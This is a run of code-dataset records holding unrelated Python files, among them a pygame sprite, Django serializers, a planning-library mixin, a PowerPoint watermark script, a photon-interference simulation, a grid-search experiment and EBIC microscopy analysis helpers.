pygame.transform.rotate(self.originalImagen,x)\n w,h = imagen.get_size()\n \n rectImagen =self.x- w/2,self.y -h/2\n \n self.rotados.append([imagen,rectImagen])\n def actualizarRotador(self,pantalla,rotado):\n pantalla.blit(self.rotados[rotado][0],self.rotados[rotado][1])\n def colicionar(self,objeto):\n \n for x in range(len(self.rects)):\n rectActual = pygame.rect.Rect((self.rects[x].left+self.rect.left,self.rects[x].top+self.rect.top,self.rects[x].width,self.rects[x].height))\n rectActualVecino = pygame.rect.Rect((objeto.rect.left,objeto.rect.top,objeto.rect.width,objeto.rect.height))\n \n if rectActual.colliderect(rectActualVecino) == True:\n \n return True\n \n \n return False\n \n \n \n \n ","repo_name":"newtonis/Py-Free-Kick","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2719448887","text":"import datetime\nfrom rest_framework import serializers\nfrom .models import Photo, Cycle, Sensor, Box, Action, Plant, Plot\nfrom django.utils import timezone\n\n\nclass SecondsFromStartMixin():\n def get_seconds_from_cycle_start(self, obj):\n 
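# Hedged side note: datetime.timedelta provides total_seconds(), so the\n        # manual days/seconds arithmetic below could equivalently be written as\n        #   return int((obj.created - obj.cycle.created).total_seconds())\n        # (total_seconds() returns a float that also includes microseconds).\n        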
delta = (obj.created - obj.cycle.created)\n return (delta.days * 3600 * 24) + delta.seconds\n\n\nclass PhotoSerializer(SecondsFromStartMixin, serializers.HyperlinkedModelSerializer):\n box = serializers.IntegerField(write_only=True)\n seconds_from_cycle_start = serializers.SerializerMethodField()\n\n class Meta:\n model = Photo\n fields = ('id', 'photo', 'box', 'created', 'seconds_from_cycle_start', 'removed')\n\n def create(self, validated_data):\n box = validated_data.pop('box')\n validated_data['owner'] = self.context['request'].user\n validated_data['cycle'] = Cycle.objects.filter(active=True).filter(box__id=box).order_by('-modified').first()\n return super().create(validated_data)\n\n\nclass PlotSerializer(serializers.HyperlinkedModelSerializer):\n cycle_id = serializers.IntegerField()\n\n class Meta:\n model = Plot\n fields = ('id', 'plot', 'cycle_id', 'created', 'description')\n\n def create(self, validated_data):\n cycle_id = validated_data.pop('cycle_id')\n cycle = Cycle.objects.filter(pk=cycle_id).first()\n validated_data['cycle'] = cycle\n # magic here, because the api should always be POST\n existing = Plot.objects.filter(cycle=cycle, description=validated_data['description']).first()\n if existing:\n existing.plot.delete(save=False)\n existing.plot = validated_data['plot']\n existing.save()\n return existing\n return super().create(validated_data)\n\n\nclass SensorCreateSerializer(serializers.HyperlinkedModelSerializer):\n box = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = Sensor\n fields = ('id', 'box',\n 'sensor_type', 'value_type', 'description', 'position', 'unit', 'value')\n\n def create(self, validated_data):\n box = validated_data.pop('box')\n validated_data['cycle'] = Cycle.objects.filter(active=True).filter(box__id=box).order_by('-modified').first()\n return super().create(validated_data)\n\n\nclass ActionSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Action\n fields = ('action_type', 'decision', 'start_time', 'cycle')\n extra_kwargs = {'cycle': {'write_only': True}}\n\n\nclass BoxSerializer(serializers.ModelSerializer):\n sensors = serializers.SerializerMethodField()\n defaults = serializers.SerializerMethodField()\n\n def get_defaults(self, obj):\n current_cycle = Cycle.objects.filter(active=True).filter(box__id=obj.pk).order_by('-modified').first()\n return {\n 'water': current_cycle.water_start_level,\n 'uv': current_cycle.uv_start_level,\n }\n\n def get_sensors(self, obj):\n current_cycle = Cycle.objects.filter(active=True).filter(box__id=obj.pk).order_by('-modified').first()\n time_threshold = timezone.now() - datetime.timedelta(minutes=6)\n sensor_list = current_cycle.sensor.filter(created__gt=time_threshold).order_by('-modified')\n return SensorSerializer(sensor_list, many=True).data\n\n class Meta:\n model = Box\n fields = ('id', 'sensors', 'defaults')\n\n\nclass BoxActionSerializer(serializers.HyperlinkedModelSerializer):\n action = serializers.SerializerMethodField()\n\n class Meta:\n model = Box\n fields = ('id', 'action')\n\n def get_action(self, obj):\n dt = timezone.now()\n dt = dt.replace(minute=0, second=0, microsecond=0)\n current_cycle = Cycle.objects.filter(active=True).filter(box__id=obj.pk).order_by('-modified').first()\n qs_action = Action.objects.filter(cycle=current_cycle).filter(start_time__gte=dt)\n if not qs_action:\n dt_prev = dt - datetime.timedelta(hours=1)\n prev_actions = Action.objects.filter(cycle=current_cycle).filter(start_time__gte=dt_prev)\n\n # create actions\n actions = []\n for 
action, _ in Action.ACTION_CHOICES:\n p = prev_actions.filter(action_type=action).order_by('-modified').first()\n if p:\n p = p.decision\n else:\n if action == 'UV light':\n p = current_cycle.uv_start_level\n elif action == 'Water':\n p = current_cycle.water_start_level\n d = {\n 'action_type': action,\n 'start_time': dt,\n 'decision': p,\n 'cycle': current_cycle,\n }\n actions.append(ActionSerializer().create(d))\n else:\n actions = [qs_action.filter(action_type=action).order_by('-modified').first() for action, _ in Action.ACTION_CHOICES]\n return [ActionSerializer(instance=i).data for i in actions]\n\n\nclass PlantSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Plant\n fields = ('id', 'name_en', 'name_la', 'wikipedia_en')\n\n\nclass CycleSerializer(serializers.ModelSerializer):\n plant = PlantSerializer()\n\n class Meta:\n model = Cycle\n fields = ('id', 'start_date', 'name', 'soil', 'plant', 'box')\n\n\nclass SensorSerializer(SecondsFromStartMixin, serializers.ModelSerializer):\n seconds_from_cycle_start = serializers.SerializerMethodField()\n\n class Meta:\n model = Sensor\n fields = ('id', 'cycle', 'sensor_type', 'value_type', 'description',\n 'position', 'unit', 'value', 'created', 'seconds_from_cycle_start')\n","repo_name":"aerospaceresearch/cress-website","sub_path":"cress/box/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36864124545","text":"from abc import ABC, abstractmethod\nfrom warnings import warn\nimport unified_planning as up\nfrom typing import Any, Dict, List, Optional, Tuple\n\n\nclass PortfolioSelectorMixin(ABC):\n \"\"\"Base class that must be extended by an :class:`~unified_planning.engines.Engine` that is also a `PortfolioSelector`.\"\"\"\n\n def __init__(self):\n self.optimality_metric_required = False\n\n @staticmethod\n def is_portfolio_selector() -> bool:\n return True\n\n @staticmethod\n def satisfies(\n optimality_guarantee: \"up.engines.mixins.oneshot_planner.OptimalityGuarantee\",\n ) -> bool:\n \"\"\"\n :param optimality_guarantee: The `optimality_guarantee` that must be satisfied.\n :return: `True` if the `PortfolioSelectorMixin` implementation satisfies the given\n `optimality_guarantee`, `False` otherwise.\n \"\"\"\n return False\n\n def get_best_oneshot_planners(\n self,\n problem: \"up.model.AbstractProblem\",\n max_planners: Optional[int] = None,\n ) -> Tuple[List[str], List[Dict[str, Any]]]:\n \"\"\"\n This method takes an `AbstractProblem`, an operation_mode and optionally an integer\n and returns a Tuple of 2 elements:\n The first one is a list of names of oneshot planners that are currently installed and that can\n solve the problem; the list is ordered following some performance criteria, where\n the first element is the best one.\n\n The second one is a list of Dict[str, Any] and represents the parameters of the planners\n in the first list.\n\n For example, a result like this: (['tamer', 'enhsp-opt'], [{'weight': 0.8}, {}])\n shows that the best result is obtained with 'tamer' with paramseters: {'weight': 0.8}\n and the second best result is obtained with 'enhsp-opt' without parameters (represented by an empty dict)\n\n :param problem: the problem on which the performance of the different planners are tested.\n :param max_planners: if specified, gives a maximum length to the 2 returned lists.\n :return: 2 lists; the first contains the names of the chosen planners, the second 
one contains the\n        parameters to give to the planners in the first list.\n        \"\"\"\n        assert isinstance(self, up.engines.engine.Engine)\n        problem_kind = problem.kind\n        if not self.skip_checks and not self.supports(problem_kind):\n            msg = f\"{self.name} cannot solve this kind of problem!\"\n            if self.error_on_failed_checks:\n                raise up.exceptions.UPUsageError(msg)\n            else:\n                warn(msg)\n        if not problem_kind.has_quality_metrics() and self.optimality_metric_required:\n            msg = f\"The problem has no quality metrics but the planners are required to be optimal!\"\n            raise up.exceptions.UPUsageError(msg)\n        if max_planners is not None and max_planners <= 0:\n            raise up.exceptions.UPUsageError(\n                f\"The specified number of max_planners must be > 0 but {max_planners} is given!\"\n            )\n        return self._get_best_oneshot_planners(problem, max_planners)\n\n    @abstractmethod\n    def _get_best_oneshot_planners(\n        self,\n        problem: \"up.model.AbstractProblem\",\n        max_planners: Optional[int] = None,\n    ) -> Tuple[List[str], List[Dict[str, Any]]]:\n        \"\"\"Method called by the PortfolioSelectorMixin.get_best_oneshot_planners method.\"\"\"\n        raise NotImplementedError\n","repo_name":"aiplan4eu/unified-planning","sub_path":"unified_planning/engines/mixins/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"54"} +{"seq_id":"19171351638","text":"import nltk\nfrom nltk.corpus import wordnet\n\ndef findSynonyms(text):\n    synonyms = []\n    antonyms = []\n\n    for syn in wordnet.synsets(text):\n        for l in syn.lemmas():\n            synonyms.append(l.name())\n            if l.antonyms():\n                antonyms.append(l.antonyms()[0].name())\n    return synonyms, antonyms\n\nif __name__ == \"__main__\":\n    temp = findSynonyms(\"hello\")\n    print(temp[0])\n    print(temp[1])","repo_name":"marcus-tam/COSC310_ChatBot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12882685838","text":"# PPT from images: apply a logo to each image while maintaining the aspect ratio of the original images\nimport os\nfrom wand.image import Image\nfrom pptx import Presentation\nfrom pptx.util import Inches\n\n# Original image resizing, maintaining the aspect ratio\n\ndef resize_original_image(image1, new_width):\n    width, height = image1.size\n    aspect_ratio = width/height\n    # divide by the ratio so that width/height is preserved\n    new_height = int(new_width/aspect_ratio)\n    image1.resize(new_width, new_height)\n    return image1\n\n# Logo Image resizing\ndef resize_original_logo(image2, new_width):\n    width, height = image2.size\n    aspect_ratio = width/height\n    new_height = 15\n    image2.resize(new_width, new_height)\n    return image2\n\n\n# list all images from a given folder\nimage_directory = \"Resources\"\nimage_list = os.listdir(image_directory)\nimage_list = image_list[0:5]\n\n\n\nprs = Presentation()\nbullet_slide_layout = prs.slide_layouts[1]\n\nwith Image(filename=\"Resources/nike_black.png\") as img1:\n    img1 = resize_original_logo(img1, 75)\n    for image in image_list:\n        Resource_file = \"Resources/\"+image\n        water_mark_image_path = \"output/\"+image\n        with Image(filename=Resource_file) as img2:\n            img2 = resize_original_image(img2, 200)\n\n            # Apply watermark process on original image one by one\n            img2.composite_channel('all_channels', img1, 'dissolve', 4, 4)\n\n            # Adding watermark images on ppt slide one by one\n            img2.save(filename=water_mark_image_path)\n            slide = prs.slides.add_slide(bullet_slide_layout)\n            shapes = slide.shapes\n            
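# Hedged usage note: python-pptx's add_picture() (used a few lines below)\n            # also accepts optional width/height arguments as EMU values such as\n            # Inches(...); when both are omitted the picture is placed at its\n            # native size, e.g.\n            #   slide.shapes.add_picture(path, left, top, width=Inches(3))\n            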
title_shape = shapes.title\n            body_shape = shapes.placeholders[1]\n            title_shape.text = 'Sample Title 1'\n            tf = body_shape.text_frame\n            tf.text = 'Sample Subtitle 1'\n            left = Inches(1)\n            top = Inches(2.8)\n            pic = slide.shapes.add_picture(water_mark_image_path, left, top)\nprs.save('Resources/watermark_images.pptx')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Ranjana151/PPT_From_Images","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29068246240","text":"\"\"\"\nHOM between Dario's SPDC idler and my write photon\nThis only requires beam splitter counts, and no time bin photons\nHowever, 4-fold heralding is required\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\np = {\"bsplit\": 0.5, # Beam splitter ratio\n     \n     \"eta_606\": 0.5, # 606 nm detector quantum efficiency\n     \"eta_1436\": 0.8, # 1436 nm detector quantum efficiency\n     # \"eta_1436\": 0.8*0.5, # 1436 nm detector quantum efficiency\n     \"eta_780\": 0.5, # 780 nm detector quantum efficiency\n     \n     \"eta_D_int\": 0.45, # DLCZ intrinsic retrieval efficiency\n     \"eta_D_cou_r\": 0.85, # DLCZ read coupling efficiency\n     \"eta_D_tr_r\": 0.95, # DLCZ read trans. eff. incl. filters\n     \"eta_D_cou_w\": 0.75, # DLCZ write coupling efficiency\n     \"eta_D_tr_w\": 0.95*0.3,# DLCZ write trans. eff. incl. filters\n     \"eta_D_cav\": 0.8, # DLCZ cavity escape efficiency\n     \"alpha\": 2*10/np.pi, # DLCZ read enhancement\n     \"D_D\": 1.5/(9+1.5), # DLCZ duty cycle\n     \"R_D\": 1/(1.5*10**-6), # DLCZ write trial repetition rate\n     \"p_spin\": 0.01, # DLCZ Spinwave creation prop.\n     \n     \"eta_QFC\": 0.15, # QFC total efficiency fiber-to-fiber\n     \n     \"eta_SPDC_cou_s\": 0.7, # SPDC signal coupling efficiency\n     \"eta_SPDC_tr_s\": 1, # SPDC signal trans. eff. incl. filters\n     \"eta_SPDC_cou_i\": 0.7, # SPDC idler coupling efficiency\n     \"eta_SPDC_tr_i\": 0.5, # SPDC idler trans. eff. incl. 
filters\n     \"eta_SPDC_cav\": 0.5, # SPDC cavity escape efficiency\n     \"g_SPDC\": 2/10, # SPDC idler autocorrelation\n     \"D_SPDC\": 0.5, # SPDC duty cycle\n     \n     # Probability of having SPDC photon pair generated per second\n     # There is a factor 2 at the end which should be 1/D_SPDC\n     \"p_pair\": 800/(0.8*0.5*0.5*0.7*0.5*0.5*0.7)*2, \n     \n     \"eta\": 0.9 # Photon overlap factor \n} \n\n\n#%% Simulation function definition\n\ndef sim(p, **kwarg):\n\n    for k in kwarg:\n        p[k] = kwarg[k]\n    \n    # Intrinsic DLCZ retrieval efficiency with read cavity\n    eta_D_int_eff = p[\"eta_D_int\"]*p[\"alpha\"]/(1+p[\"eta_D_int\"]*(p[\"alpha\"]-1))\n    \n    # Multiplicative detection efficiency\n    eta_det = np.sqrt(p[\"bsplit\"]*(1-p[\"bsplit\"])*p[\"eta_1436\"]**2)\n    \n    # Probability to find a heralded DLCZ write photon in front of the beam splitter \n    p_D = p[\"p_spin\"]*p[\"eta_D_cou_w\"]*p[\"eta_D_tr_w\"]*p[\"eta_D_cav\"]**2*\\\n        eta_D_int_eff*p[\"eta_D_tr_r\"]*p[\"eta_D_cou_r\"]*p[\"eta_QFC\"]*p[\"eta_780\"]\n    \n    # Probability to find a heralded idler photon in front of the beam splitter\n    p_SPDC = p[\"p_pair\"]*p[\"eta_SPDC_cav\"]**2*p[\"eta_SPDC_cou_i\"] * \\\n        p[\"eta_SPDC_tr_i\"]*p[\"eta_SPDC_tr_s\"]*p[\"eta_SPDC_cou_s\"]*p[\"eta_606\"]*400e-9 \n    \n    # DLCZ cross correlation function g_wr\n    g_D_wr = 1 +(eta_D_int_eff*(1-p[\"p_spin\"]))/(p[\"p_spin\"]*eta_D_int_eff + \\\n        + p[\"p_spin\"]*(1-eta_D_int_eff)*0.5)\n    \n    # DLCZ autocorrelation function g_rr,w, based on the crosscorrelation\n    g_D = 4/(g_D_wr-1)\n    \n    # SPDC autocorrelation function g_rr\n    g_SPDC = p[\"g_SPDC\"]\n    \n    # Probability of coincidence click per trial, indistinguishable case\n    p_12 = p_SPDC**2*eta_det**2*g_SPDC + p_D**2*eta_det**2*g_D + 2*eta_det**2*p_SPDC*p_D*(1-p[\"eta\"])\n    \n    # Probability of coincidence click per trial, distinguishable case\n    p_12_0 = p_SPDC**2*eta_det**2*g_SPDC + p_D**2*eta_det**2*g_D + 2*eta_det**2*p_SPDC*p_D\n    \n    # Visibility\n    V = 1-p_12/p_12_0\n    \n    # Mysterious parameter of coincidence count rate in distinguishable case.\n    X = p[\"D_D\"]*p[\"D_SPDC\"]*p[\"R_D\"]*p_12_0\n    \n    return g_D, g_D_wr,V,X,p_12_0,p_12, p_D, p_SPDC\n\n#%% Some simulations\n\np_spinwave = np.linspace(0.005,0.2,100) # Detected DLCZ write photon rate per second\nplt.close(1)\nfig, ax = plt.subplots(1,3, num = 1, figsize = (12,4))\n\npara = \"eta_QFC\" #[0.99,0.9,0.8]\n\n \nfor scanner in [0.15]:\n    \n    p_c = p.copy() \n    \n    p_c[para] = scanner\n    label = str(scanner)\n\n    d = pd.DataFrame(np.array([sim(p_c, **{\"p_spin\":p}) for p in p_spinwave]), \n                 columns = [\"g_D\", \"g_D_wr\",\"V\",\"X\",\"p_12_0\",\"p_12\", \"p_D\", \"p_SPDC\"])\n    print(d.max())\n    ax[0].plot(d[\"X\"]*3600,d[\"V\"], label = label)\n    ax[0].set_xlabel(\"Coincidences dist. case (1/h)\")\n    ax[0].set_ylabel(\"Visibility\")\n    \n    ax[2].plot(d[\"X\"]*3600,d[\"g_D\"], label = label)\n    ax[2].set_xlabel(\"Coincidences dist. 
case (1/h)\")\n ax[2].set_ylabel(r\"$g_{r,r}^{(2)}$ DLCZ\")\n \n ax[1].plot(p_spinwave*100,d[\"V\"], label = label)\n ax[1].set_xlabel(\"p DLCZ (%)\")\n ax[1].set_ylabel(\"Visibility\")\n\nax[0].set_xlim((0,75))\nax[2].set_xlim((0,75))\nax[0].legend(title = para)\nplt.tight_layout()\nplt.show()\n\nplt.savefig(\"output/sim.png\", dpi = 300, bbox_inches = \"tight\")\n\n\n\n\n\n\n\n","repo_name":"LukasHeller/simulations","sub_path":"HOM_with_Dario_countestimate.py","file_name":"HOM_with_Dario_countestimate.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"146084601","text":"#!/usr/bin/env python\n\n'''\nConducts a grid search of the hyperparameters used by the classifiers in Pythia (logreg, svm, xgboost)\n\nThe output is recorded by Sacred if a MongoObserver is passed in via command line (-m HOST:PORT:MY_DB)\n\nInput\nexperimentdatafile (required) : Path to file containing data features from Pythia's master pipeline\nsvmsearch : Boolean value to execute Grid Search on Support Vector Machine model\nsvmparams : Grid Search parameters for Support Vector Machine model\nlogregsearch : Boolean value to execute Grid Search on Logistic Regression model\nlogregparams : Grid Search parameters for Logistic Regression model\nxgbsearch : Boolean value to execute Grid Search on XGBoost model\nxgbparams : Grid Search parameters for XGBoost model\nallscores : Boolean value to print all calculated Fscores to stderr and pass to Sacred\n\nOutput\nresults (dict) : Dictionary containing best score, best parameters, best estimator from Grid Search\nand metadata about the data file that was examined by Grid Search. Results dict is recorded by Sacred.\n'''\n\nfrom sklearn import svm, linear_model, grid_search\nimport xgboost\nimport pickle\nimport os\nimport sys\n\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\n\ndef set_up_xp():\n\n ex_name = 'pythia_gridsearch'\n ex = Experiment(ex_name)\n\n return ex\n\nxp = set_up_xp()\n\n@xp.capture\ndef conduct_grid_search(experimentdatafile,svmsearch,svmparams,logregsearch,logregparams,xgbsearch,xgbparams,allscores):\n\n # Ensure that only one classifier has been selected to grid search\n test = [svmsearch,logregsearch,xgbsearch]\n if test.count(True) == 0 or test.count(True) > 1:\n print(\"Error: Grid Search requires one classifier\\n\")\n quit()\n\n # Initiate classifiers and parameters as needed \n if svmsearch:\n svmmodel = svm.SVC()\n classifier=['SVM', svmmodel, svmparams]\n elif logregsearch:\n logregmodel = linear_model.LogisticRegression()\n classifier=[\"Logistic Regression\", logregmodel, logregparams]\n elif xgbsearch:\n xgbmodel = xgboost.XGBClassifier()\n classifier=[\"XGBoost\", xgbmodel, xgbparams]\n\n print(\"Searching \" + classifier[0] + \" parameters...\", file=sys.stderr)\n\n # Load data files\n lunchbox = pickle.load(open(experimentdatafile,\"rb\"))\n\n # Conduct grid search of selected classifier\n clf = grid_search.GridSearchCV(classifier[1], classifier[2])\n clf.fit(lunchbox['train_data'], lunchbox['train_target'])\n\n results = dict()\n results[\"gridsearch_classifier\"] = classifier[0]\n results[\"gridsearch_best_params\"] = clf.best_params_\n results[\"gridsearch_best_score\"] = clf.best_score_\n results[\"gridsearch_best_estimator\"] = str(clf.best_estimator_)\n results['directory'] = lunchbox['directory']\n results['features'] = lunchbox['features']\n results['algorithms'] = lunchbox['algorithms']\n 
results['parameters'] = lunchbox['parameters']\n\n    # Print all Grid Search results\n    print(\"Best Estimator\",clf.best_estimator_, file=sys.stderr)\n    print(\"Best Score\", clf.best_score_, file=sys.stderr)\n    print(\"Best Parameters\", clf.best_params_, file=sys.stderr)\n\n    if allscores:\n        print(\"All Scores\", file=sys.stderr)\n        for score in clf.grid_scores_:\n            print(score, file=sys.stderr)\n        results['allscores'] = str(clf.grid_scores_)\n\n    return results\n\n@xp.config\ndef config_variables():\n    # Path to file containing data features\n    experimentdatafile = \"data/experimentdatafile.pkl\"\n\n    # Boolean value to execute Grid Search on Support Vector Machine model\n    svmsearch = False\n\n    # Grid Search parameters for Support Vector Machine model\n    svmparams = {'kernel':['linear', 'rbf', 'poly'], \\\n            'C':[0.001, 0.01, 0.1, 1, 10, 100, 1000], \\\n            'gamma': ['auto', 0.01, 0.001, 0.0001, 0.0001]}\n\n    # Boolean value to execute Grid Search on Logistic Regression model\n    logregsearch = False\n\n    # Grid Search parameters for Logistic Regression model\n    logregparams = {'penalty':['l1', 'l2'], \\\n            'C':[0.001, 0.01, 0.1, 1, 10, 100, 1000], \\\n            'tol': [0.01, 0.001, 0.0001, 0.0001, 0.00001]}\n\n    # Boolean value to execute Grid Search on XGBoost model\n    xgbsearch = False\n\n    # Grid Search parameters for XGBoost model\n    xgbparams = {'learning_rate':[.001, .01, .1, .2, .5], \\\n            'max_depth':[3, 5, 10, 50, 100], \\\n            'min_child_weight': [2, 5, 10, 50, 100]}\n\n    # Boolean value to print all scores from Grid Search\n    allscores = False\n\n@xp.automain\ndef run_experiment():\n    return conduct_grid_search()","repo_name":"Lab41/pythia","sub_path":"experiments/conduct_grid_search.py","file_name":"conduct_grid_search.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"54"} +{"seq_id":"73077420640","text":"import sys\n\nsys.stdin = open('3-4input.txt')\n\nn, m = map(int, input().split())\n\ncnt = 0\nwhile True:\n    # subtract 1 from n until n is divisible by m\n    target = (n//m) * m\n    cnt += (n-target)\n\n    n = target\n    #print(target)\n    # once n is smaller than m, no further division is possible: exit the loop\n    if n < m:\n        break\n    cnt += 1\n    n //= m\n    #print(n)\n\ncnt += (n-1)\nprint(cnt)","repo_name":"cmkds/algo","sub_path":"이코테/파트2/ch3 그리디/3-4 1이 될 때까지 답안 예시.py","file_name":"3-4 1이 될 때까지 답안 예시.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21071632257","text":"import numpy as np\nimport hyperspy.api as hs\n\nfrom skimage.transform import hough_line, hough_line_peaks, probabilistic_hough_line\nfrom skimage.feature import canny\nimport matplotlib.pyplot as plt\n\n\ndef Find_number(string):\n    '''Pulls the number out from between xmp flags.'''\n    start = string.find('>') + 1\n    finish = string.find('</')\n    return string[start:finish] \n\ndef Split_add_scale(all_tifs, files):\n    '''Split the HAADF and EBIC images into different stacks. Corrects the spatial scale. 
The images need to be in a hyperspy stack.'''\n if np.shape(np.shape(all_tifs))[0] == 3:\n \"for only one type of image\"\n for i in range(0,2):\n all_tifs.axes_manager[i].scale = Pull_Meta_dictionary(files[0])['Scale']*1e09 #convert to nm\n all_tifs.axes_manager[i].units = 'nm'\n\n HAADFs = all_tifs.split(axis=0)\n return HAADFs\n\t\t\n elif np.shape(np.shape(all_tifs))[0] == 4: \n\n for i in range(2,4):\n all_tifs.axes_manager[i].scale = Pull_Meta_dictionary(files[0])['Scale']*1e09 #convert to nm\n all_tifs.axes_manager[i].units = 'nm'\n\n HAADFs, EBIC_raw = all_tifs.split(axis=0)\n return HAADFs, EBIC_raw\n\n\ndef Pull_Meta_dictionary(file):\n '''Searches a tif file for the array of search words. Compiles a dictionary from these. The HAADF values are\n written first, then the EBIC values overwrite these.'''\n \n \n search_words = np.array(['Mag>', 'PixelSizeX>', '<ebic:Ooffset', '<ebic:Contr', '<ebic:InvIoffset',\n '<ebic:PreampGain', '<cdev:HV', '<ebic:BeamCurrent', 'diAdj:A1Gain>',\n '<diImg:VideoInCalibration'])\n\n Meta_dictionary = {}\n\n flag = 0\n\n for word in search_words:\n with open(file, 'r', encoding='utf-8', errors='ignore') as fd:\n for line in fd:\n if flag == 1:\n #print(word)\n Meta_dictionary.update({word : Find_number(line)})\n flag = 0\n\n elif flag == 3:\n Meta_dictionary.update({'Video_Offset' : Find_number(line)})\n flag = 0\n\n elif flag == 2:\n #print(word)\n Meta_dictionary.update({word : Find_number(line)})\n flag = 3\n\n\n\n\n elif word in line:\n if word in ['Mag>', 'PixelSizeX>', '<ebic:InvIoffset', 'diAdj:A1Gain>']:\n Meta_dictionary.update({word : Find_number(line)})\n elif word in ['<ebic:Contr', '<ebic:Ooffset', '<ebic:PreampGain', '<cdev:HV',\n '<ebic:BeamCurrent']:\n flag = 1\n\n elif word in ['<diImg:VideoInCalibration']:\n flag = 2\n \n Clean_meta_dictionary = {'Mag' : int(Meta_dictionary['Mag>']),\n 'Scale' : np.float(Meta_dictionary['PixelSizeX>']),\n 'InvIoffset' : np.float(Meta_dictionary['<ebic:InvIoffset']),\n 'Ooffset' : np.float(Meta_dictionary['<ebic:Ooffset']),\n 'Contrast' : np.float(Meta_dictionary['<ebic:Contr']),\n 'PreampGain' : np.float(Meta_dictionary['<ebic:PreampGain']),\n 'HV': np.float(Meta_dictionary['<cdev:HV']),\n 'BeamCurrent' : np.float(Meta_dictionary['<ebic:BeamCurrent']),\n 'A1Gain': np.float(Meta_dictionary['diAdj:A1Gain>']),\n 'Video_gain' : np.float(Meta_dictionary['<diImg:VideoInCalibration']),\n 'Video_offset' : np.float(Meta_dictionary['Video_Offset'])}\n return Clean_meta_dictionary\n\ndef greyscale_to_videoV(value, Metadata_dict):\n 'V = ADC-Value / Gain – Offset'\n return (value / Metadata_dict['Video_gain']) - Metadata_dict['Video_offset']\n\ndef diffV_to_current(value, Metadata_dict):\n return (((value - Metadata_dict['Ooffset']-(0.5-0.5000))/Metadata_dict['Contrast'])\n - Metadata_dict['InvIoffset'])/np.power(10, Metadata_dict['PreampGain']) * 1e9 * 1.0047\n\ndef greyscale_to_current(value, Metadata_dict):\n\t'''Converts any greyscale value to an ebic current. 
Uses amp settings in Metadata_dict.'''\n\treturn diffV_to_current(greyscale_to_videoV(value, Metadata_dict), Metadata_dict)\n\ndef Efficiency(greyval, Metadata_dict):\n A = ((greyval - Metadata_dict['Ooffset'])/Metadata_dict['Contrast']) - Metadata_dict['InvIoffset']\n \n B = Metadata_dict['HV'] * 250 * (Metadata_dict['BeamCurrent']/1000)\n return np.abs((A/np.power(Metadata_dict['PreampGain'], 10)) * 1e09 * 1.0047) / B\n\n\n\ndef Plot_return_Hough_transform(im, threshold=480):\n '''Plots the hough transform for the image and returns the hough peaks.'''\n image = im.data > threshold\n\n h, theta, d = hough_line(image)\n\n fig, axes = plt.subplots(1, 3, figsize=(15,6))\n\n ax = axes.ravel()\n\n ax[0].imshow(im.data)\n ax[0].set_axis_off()\n\n ax[1].imshow(np.log(1 + h),\n extent=[np.rad2deg(theta[-1]), np.rad2deg(theta[0]), d[-1], d[0]],\n aspect=1/5)\n ax[1].set_title('Hough transform')\n ax[1].set_xlabel('Angles (degrees)')\n ax[1].set_ylabel('Distance (pixels)')\n #ax[1].axis('image')\n\n ax[2].imshow(image)\n for _, angle, dist in zip(*hough_line_peaks(h, theta, d)):\n y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)\n y1 = (dist - image.shape[1] * np.cos(angle)) / np.sin(angle)\n ax[2].plot((0, image.shape[1]), (y0, y1), '-r')\n ax[2].set_xlim((0, image.shape[1]))\n ax[2].set_ylim((image.shape[0], 0))\n ax[2].set_axis_off()\n\n accum, angles, dists = hough_line_peaks(h, theta, d)\n\n plt.savefig('Hough_transform_output.png', dpi=200)\n \n return accum, angles, dists\n\ndef Fit_ebic_profile(series, scale, ):\n '''Fits an ebic profile using offset, error function, and a lorenztian.'''\n \n s = hs.signals.Signal1D(series)\n s.axes_manager[0].scale = scale\n s.axes_manager[0].units = 'nm'\n \n m = s.create_model()\n\n s.axes_manager[0].offset = -np.argmax(s.data)* scale\n\n lorentzian = hs.model.components1D.Lorentzian() # Create a Lorentzian comp.\n offset = hs.model.components1D.Offset()\n erf = hs.model.components1D.Erf()\n\n\n lorentzian.A.value = 4000000\n lorentzian.gamma.value = 30 * scale\n\n offset.offset.value = np.min(series)\n\n erf.A.value = -9000\n erf.sigma.value = 50 * scale\n erf.origin.value = 1\n\n m.append(lorentzian) # Add it to the model\n m.append(offset)\n m.append(erf)\n \n m.fit()\n return m\n","repo_name":"aconlan/EBIC","sub_path":"ebic.py","file_name":"ebic.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13624585146","text":"# Mi primera libería\n\ndef cplxsum(a, b):\n real = a[0] + b[0]\n imag = a[1] + b[1]\n return (real, imag)\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print(cplxsum((3,5),(-2.4,6.8))) # (3 + 5i)+(-2.4 + 6.8i) = (0.6 + 11.8i)\n\n# See PyCharm help at 